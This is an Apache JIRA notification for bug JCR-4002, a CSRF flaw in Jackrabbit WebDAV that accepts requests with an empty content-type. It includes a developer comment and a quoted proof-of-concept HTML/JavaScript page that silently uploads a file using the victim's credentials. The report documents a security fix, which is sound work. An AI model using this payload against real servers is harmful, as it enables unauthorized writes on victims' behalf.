[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424812#comment-15424812
]
Julian Reschke commented on JCR-4002:
-------------------------------------
But that means that code extending from this now will have to the CSRF
protection, right? If this is true, we need (a) to document that and (b) to
review the existing code that *does* extend it (JSOP?).
> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
> Affects Versions: 2.13.1
> Reporter: Dominique Jäggi
> Assignee: Dominique Jäggi
> Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
> <body>
> <script>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
> </script>
> <form action="#">
> <input type="button" value="Submit request" onclick="submitRequest();"
> />
> </form>
> </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
